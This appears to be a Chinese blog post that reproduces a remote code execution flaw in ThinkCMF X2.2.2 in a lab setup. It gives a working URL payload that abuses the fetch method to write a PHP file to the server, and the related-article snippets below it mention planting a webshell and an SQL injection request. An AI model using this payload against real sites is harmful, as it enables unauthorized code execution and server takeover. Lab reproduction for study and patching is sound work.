ThinkCMF X2.2.2漏洞复现

最新推荐文章于 2022-11-21 10:49:41 发布
最新推荐文章于 2022-11-21 10:49:41 发布
阅读量417 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xu_1234567/article/details/108548739
版权

1.搭建环境

下载ThinkCMF X2.2.2文件,把文件放入网站目录下,打开网站,按照提示一步步进行安装。(thinkCMF安装包,百度搜索获取)

2.漏洞概述

攻击者可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,达到远程代码执行的目的。

3.漏洞利用

通过构造a参数的fetch方法,可以不需要知道文件路径就可以把php代码写入文件,下面将把PHP查看配置函数phpinfo()写入test.php文件
phpinfo版payload如下

?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test.php','<?php phpinfo(); ?>')</php>
执行payload,页面将是空白的
在这里插入图片描述访问test.php
在这里插入图片描述
到达这一步你就可以向服务器写入任意PHP文件,实现远程控制,构造恶意URL等。,

村头王二狗
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ThinkCMF X2.2.2漏洞复现
摸鱼的博客
09-12 711
一、漏洞描述ThinkCMF X2.2.2 ThinkCMF X2.2.2 二、漏洞危害 远程攻击者在无需任何权限情况下,通过构造特定的请求包即可在远程服务器上执行任意代码 三、环境搭建 ThinkCMF X2.2.2 下载:https://github.com/SaltNego/much_tools 四、漏洞复现 访问目标网站,如下图所示: 输入payload:payload:?a=fetch&templateFile=public/index&prefix=’’&cont
关于ThinkCMK x.2.2.2漏洞如何简单利用以及修改网站
qq_41918125的博客
09-14 164
一,漏洞复现 引起漏洞的最主要的问题是因为fetch函数和display函数是public类型。 fetch函数的作用是获取页面内容,调用内置模板引擎fetch方法,thinkphp的模版引擎使用的是smarty,在smarty中当key和value可控时便可以形成模板注入。 display函数的作用是加载模板和页面输出,所对应的参数为:templateFile模板文件地址,charset模板字符集,contentType输出类型,content输出内容。 fetch和display的用法差不多,二者的区别
ThinkCMF X2.2.2 漏洞获取网站权限测试
xu_1234567的博客
09-15 349
1.测试环境 创建ThinkCMF X2.2.2框架,下载antsword,下面是AntSword官网 https://github.com/AntSwordProject/antSword/releases 下载完成后进行安装,安装教程可百度查询 2.漏洞利用 在ThinkCMF X2.2.2框架中通过构造a参数的fetch方法,创建文件在文件写入一句话木马代码 ?a=fetch&templateFile=public/index&prefix=''&content=<php
ThinkCMF X2.2.2多处SQL注入漏洞分析
weixin_33924770的博客
12-21 1770
  1.     漏洞描述 ThinkCMF是一款基于ThinkPHP+MySQL开发的中文内容管理框架,其中X系列基于ThinkPHP 3.2.3开发,最后更新到2.2.2版本。最近刚好在渗透测试项目中遇到这个CMS,便审了下源码发现多处SQL注入漏洞,在Github给项目方提issues后,提交到CVE官方后很快就拿到了分配的多个编号:CVE-2018-19894、CVE-2018...
ThinkCMFX2.2.3_20161213.zip
01-23
ThinkCMF是一款基于ThinkPHP+MySQL开发的中文内容管理框架,ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展,每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。 ThinkCMFX 2.2.3 更新日志:2016-12-13 * 修复后台部分浏览器无法上传问题; * 优化chrome 上传文件时,打开文件选择框慢; * 修复后台文件添加编辑相册图片移除浏览器不兼容问题; * 修复文件上传在遨游下不能上传文件问题; * 修复后台登录错误时提示无样式。
thinkcmf2.23
07-24
ThinkCMF是一款基于ThinkPHP+MYSQL开发的中文内容管理框架(CMF),我们一直秉承ThinkPHP大道至简的理念,坚持做最简约的ThinkPHP开源软件,多应用化开发方式,让您更快地完成自己的创业项目!
ThinkCMF框架任意内容包含漏洞
qq_17754023的博客
02-28 2200
ThinkCMF简介 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展 每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时是如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本和沟通成本 漏洞介绍 远程攻击者在无需任何权限情况下,通过构造特定的
Thinkcmf2.2安装以及任意文件写入漏洞复现
SolitudeL的博客
09-16 497
I thinkcmf安装 1.下载ThinkCMF X2.2.0 链接: https://pan.baidu.com/s/1dEJJoU9?errno=0&errmsg=Auth%20Login%20Sucess&&bduss=&ssnerror=0&traceid= 此处我使用宝塔面板来搭建网站和安装thinkcmf2.2 2.进入宝塔面板点击你搭建的网站的根目录 上传你刚才下载的thinkcmf2.2的安装包 注意: 只能上传压缩包,上传成功后点击文件解压缩
ThinkCMF 任意内容包含getshell漏洞
最新发布
10-26
ThinkCMF X1.6.0、ThinkCMF X2.1.0、ThinkCMF X2.2.0、ThinkCMF X2.2.1、ThinkCMF X2.2.2 都存在该漏洞。 环境搭建: 1. 下载 ThinkCMF X2.2.2,解压后放在 WWW 目录下,然后浏览器访问即可看到安装页面。 漏洞...
ThinkCMF 框架上的任意内容包含漏洞
Sylon的博客
10-25 4538
0x01 背景 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。 ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。 每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时如何工作的,但他们之间又...
mall:ThinkCMF电商版,基于ThinkCMF5.1开发
03-16
ThinkCMF电商版(内测版)让你更自由地飞 基于ThinkCMF5.1开发的电商系统,方便用户基于ThinkCMF做更强的电商解决方案 QQ群: ThinkCMF 官方交流群:316669417 ThinkCMF 高级交流群:100828313(ƒ)高级群专属权益:第一波:两个后台风格(ThinkCMF官网风格后台主题,蓝色风格后台主题)第二波:ThinkCMF5完全开发手册离线版(PDF,EPUB,MOBI格式)更多专属权益正在路上... ThinkCMF 铲屎官交流群:415136742(生活娱乐,为有喵的猿人准备) 话题专区 反馈问题 更新日志 1.0.0
基于ThinkPhp6+Vue+ElementUI低代码开发平台
西里古里的博客
02-23 8109
一款 PHP 语言基于ThinkPhp6、Vue、ElementUI等框架精心打造的一款模块化、插件化、高性能的前后端分离架构敏捷开发框架,可用于快速搭建前后端分离后台管理系统,本着简化开发、提升开发效率的初衷,目前框架已集成了完整的RBAC权限架构和常规基础模块,前端Vue端支持多主题切换,可以根据自己喜欢的风格选择想一个的主题,实现了个性化呈现的需求;
ThinkCMF X 2.2.3 SQL注入漏洞
Shen__Kong的博客
11-07 1098
漏洞在2.3版本又以下,漏洞点与ArticleController.class.php edit_post方法SQL注入(CVE-2018-19898) 。 ThinkCMF X2.2.2是基于ThinkPHP 3.2.3开发的,ThinkPHP 3.x版本之前被爆出存在bind注入,这个漏洞就是ThinkPHP3.x注入的典型案例。漏洞位于前台文章编辑处,不过要复现这个漏洞点首先是要注册一个普...
Go语言Web开发Echo框架搭建
weixin_50196917的博客
11-21 807
一款 Go 语言基于Echo、Layui、MySQL等框架精心打造的一款模块化、插件化、高性能的前后端分离架构敏捷开发框架,可用于快速搭建前后端分离后台管理系统,本着简化开发、提升开发效率的初衷,框架自研了一套个性化的组件,实现了可插拔的组件式开发方式:单图上传、多图上传、下拉选择、开关按钮、单选按钮、多选按钮、图片裁剪等等一系列个性化、轻量级的组件,是一款真正意义上实现组件化开发的敏捷开发框架,框架已集成了完整的RBAC权限架构和常规基础模块,同时支持多主题切换,可以根据自己喜欢的风格选择想一个的主题,实
SpringCloud微服务架构前后端分离项目实践
weixin_50196917的博客
06-07 5043
一款 Java 语言基于 SpringCloud、Vue、ElementUI、MySQL等框架精心打造的一款前后端分离框架,致力于实现模块化、组件化、可插拔的前后端分离架构敏捷开发框架,可用于快速搭建前后端分离后台管理系统,本着简化开发、提升开发效率的初衷,目前框架已集成了完整的RBAC权限架构和常规基础模块,前端Vue端支持多主题切换,可以根据自己喜欢的风格选择想一个的主题的个性化呈现的需
Thinkcmf6.0安装教程
邪小新的博客
07-04 1625
Thinkcmf6.0安装教程
ThinkCMFX漏洞合集
https://www.cnblogs.com/zpchcbd/
08-13 5626
前台的SQL注入(需要前台会员权限) : POST /ThinkCMFX/index.php?g=portal&m=article&a=edit_post HTTP/1.1 Host: localhost Connection: close Cookie: PHPSESSID=kcg5v82ms3v13o8pgrhh9saj95 Content-Type: application/...
【组件攻击链】ThinkCMF 高危漏洞分析与利用
further_eye的博客
11-18 1288
ThinkCMF X2.x系列最大的风险存在于ThinkCMF框架中Controller中的两个模板操作函数。ThinkCMF 5系列近两年比较出名的就是CVE-2019-6713、CVE-2019-7580两个后台任意代码执行漏洞
ThinkCMF 内容包含漏洞详解与利用
标题中提到的"ThinkCMF 任意内容包含getshell漏洞"是指在ThinkCMF的某些版本(如X1.6.0到X2.2.2)中存在一个安全问题,使得远程攻击者无需任何权限就可以构造特定的请求,执行服务器上的任意代码,这极大地威胁了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值